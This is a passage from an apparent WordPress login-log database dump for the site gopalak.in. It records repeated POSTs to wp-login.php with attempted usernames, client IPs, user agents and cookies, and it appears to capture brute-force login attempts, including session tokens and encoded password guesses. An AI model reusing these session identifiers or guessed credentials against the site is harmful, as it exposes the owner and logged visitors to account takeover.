Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"34252\";s:11:\"REMOTE_ADDR\";s:13:\"68.65.122.219\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"102\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746796106.0822821;s:12:\"REQUEST_TIME\";i:1746796106;}}','68.65.122.219',0,'2025-05-09 18:38:27','1970-01-01 00:00:00'),(95086,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ko-KR,ko;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, br, deflate, zstd\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"100\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"43998\";s:11:\"REMOTE_ADDR\";s:15:\"103.169.160.163\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746796789.4034121;s:12:\"REQUEST_TIME\";i:1746796789;}}','103.169.160.163',0,'2025-05-09 18:49:51','1970-01-01 00:00:00'),(95087,0,'a:2:{s:8:\"username\";s:7:\"wadminw\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:68:\"wordpress_test_cookie=WP+Cookie+check; _uid=rB8jg2geAxWYrxqNA00iAg==\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"cs-CZ,cs;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:19:\"gzip, zstd, deflate\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"105\";s:15:\"HTTP_USER_AGENT\";s:86:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:128.0) Gecko/20100101 Firefox/128.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"57506\";s:11:\"REMOTE_ADDR\";s:13:\"198.54.120.17\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"105\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746797334.4354889;s:12:\"REQUEST_TIME\";i:1746797334;}}','198.54.120.17',0,'2025-05-09 18:58:56','1970-01-01 00:00:00'),(95088,0,'a:2:{s:8:\"username\";s:11:\"yanz@123457\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:68:\"wordpress_test_cookie=WP+Cookie+check; _uid=rB8jg2geB56YrxqNA04aAg==\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"fr-FR,fr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"109\";s:15:\"HTTP_USER_AGENT\";s:125:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"43822\";s:11:\"REMOTE_ADDR\";s:14:\"188.166.237.78\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"109\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746798494.308584;s:12:\"REQUEST_TIME\";i:1746798494;}}','188.166.237.78',0,'2025-05-09 19:18:15','1970-01-01 00:00:00'),(95089,0,'a:2:{s:8:\"username\";s:24:\"loggershell443@gmail.com\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:68:\"wordpress_test_cookie=WP+Cookie+check; _uid=rB8jg2geCeiYrxqNA07JAg==\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"hu-HU,hu;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, br, deflate\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"122\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"40430\";s:11:\"REMOTE_ADDR\";s:15:\"103.161.173.219\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"122\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746799080.276438;s:12:\"REQUEST_TIME\";i:1746799080;}}','103.161.173.219',0,'2025-05-09 19:28:02','1970-01-01 00:00:00'),(95090,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:37:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:30:\"http://gopalak.in/wp-login.php\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"79\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36\";s:11:\"HTTP_COOKIE\";s:254:\"_uid=rB8jg2geOadsUVttAw0yAg==; wp_wpfileupload_3b69a4c0d2d060222158af339a5f9adb=fe4s2TQmEKwAfMfrntp9fz1f1dNa4t4D; PHPSESSID=34611217376c150ae936028142ecca3f; swpm_session=a4e28891572d2564bbaea7862f8c6f66; _jwp=1; wordpress_test_cookie=WP%20Cookie%20check\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:15:\"HTTP_KEEP_ALIVE\";s:3:\"300\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"62442\";s:11:\"REMOTE_ADDR\";s:14:\"109.176.202.52\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"79\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746811310.202522;s:12:\"REQUEST_TIME\";i:1746811310;}}','109.176.202.52',1,'2025-05-09 22:51:51','2025-05-09 23:01:59'),(95091,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:37:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:30:\"http://gopalak.in/wp-login.php\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"79\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36\";s:11:\"HTTP_COOKIE\";s:286:\"_uid=rB8jg2geOadsUVttAw0yAg==; wp_wpfileupload_3b69a4c0d2d060222158af339a5f9adb=fe4s2TQmEKwAfMfrntp9fz1f1dNa4t4D; PHPSESSID=34611217376c150ae936028142ecca3f; swpm_session=a4e28891572d2564bbaea7862f8c6f66; _jwp=1; wordpress_test_cookie=WP%20Cookie%20check; _wptn=c2l0ZW1hbmFnZXI7QY5FUlRZ\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:15:\"HTTP_KEEP_ALIVE\";s:3:\"300\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"62442\";s:11:\"REMOTE_ADDR\";s:14:\"109.176.202.52\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"79\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746811312.0172911;s:12:\"REQUEST_TIME\";i:1746811312;}}','109.176.202.52',1,'2025-05-09 22:51:53','2025-05-09 23:01:59'),(95092,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:37:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:30:\"http://gopalak.in/wp-login.php\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"79\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36\";s:11:\"HTTP_COOKIE\";s:286:\"_uid=rB8jg2geOadsUVttAw0yAg==; wp_wpfileupload_3b69a4c0d2d060222158af339a5f9adb=fe4s2TQmEKwAfMfrntp9fz1f1dNa4t4D; PHPSESSID=34611217376c150ae936028142ecca3f; swpm_session=a4e28891572d2564bbaea7862f8c6f66; _jwp=1; wordpress_test_cookie=WP%20Cookie%20check; _wptn=c2l0ZW1hbmFnZXI7YZ5lcnR5\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:15:\"HTTP_KEEP_ALIVE\";s:3:\"300\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"62442\";s:11:\"REMOTE_ADDR\";s:14:\"109.176.202.52\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"79\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746811313.822365;s:12:\"REQUEST_TIME\";i:1746811313;}}','109.176.202.52',1,'2025-05-09 22:51:55','2025-05-09 23:01:59'),(95093,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:37:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:30:\"http://gopalak.in/wp-login.php\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"79\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36\";s:11:\"HTTP_COOKIE\";s:286:\"_uid=rB8jg2geOadsUVttAw0yAg==; wp_wpfileupload_3b69a4c0d2d060222158af339a5f9adb=fe4s2TQmEKwAfMfrntp9fz1f1dNa4t4D; PHPSESSID=34611217376c150ae936028142ecca3f; swpm_session=a4e28891572d2564bbaea7862f8c6f66; _jwp=1; wordpress_test_cookie=WP%20Cookie%20check; _wptn=c2l0ZW1hbmFnZXI7VUdKUk1W\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:15:\"HTTP_KEEP_ALIVE\";s:3:\"300\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"62442\";s:11:\"REMOTE_ADDR\";s:14:\"109.176.202.52\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"79\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746811315.632452;s:12:\"REQUEST_TIME\";i:1746811315;}}','109.176.202.52',1,'2025-05-09 22:51:57','2025-05-09 23:01:59'),(95094,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:37:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:30:\"http://gopalak.in/wp-login.php\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"81\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36\";s:11:\"HTTP_COOKIE\";s:286:\"_uid=rB8jg2geOadsUVttAw0yAg==; wp_wpfileupload_3b69a4c0d2d060222158af339a5f9adb=fe4s2TQmEKwAfMfrntp9fz1f1dNa4t4D; PHPSESSID=34611217376c150ae936028142ecca3f; swpm_session=a4e28891572d2564bbaea7862f8c6f66; _jwp=1; wordpress_test_cookie=WP%20Cookie%20check; _wptn=c2l0ZW1hbmFnZXI7dWdqcm12\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:15:\"HTTP_KEEP_ALIVE\";s:3:\"300\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"62442\";s:11:\"REMOTE_ADDR\";s:14:\"109.176.202.52\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"81\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746811317.40501;s:12:\"REQUEST_TIME\";i:1746811317;}}','109.176.202.52',1,'2025-05-09 22:51:58','2025-05-09 23:01:59'),(95095,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:37:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:30:\"http://gopalak.in/wp-login.php\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"87\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36\";s:11:\"HTTP_COOKIE\";s:298:\"_uid=rB8jg2geOadsUVttAw0yAg==; 